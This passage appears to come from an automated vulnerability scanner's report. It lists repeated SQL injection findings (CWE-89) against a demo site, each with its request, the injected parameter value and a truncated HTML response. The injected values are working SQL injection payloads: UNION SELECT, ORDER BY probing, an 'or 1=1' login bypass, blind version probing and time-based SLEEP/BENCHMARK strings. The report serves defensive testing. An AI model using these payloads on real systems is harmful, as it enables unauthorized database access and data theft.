href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1155\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# +\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1156\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ,\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1157\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1158\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1159Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1160\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1161\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1162\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# and (select substring(@@version,3,1))='S'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1163\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1164\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1165\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1166\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1167\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ' o/**/r 1/0 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1168\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1169\nScan SQL 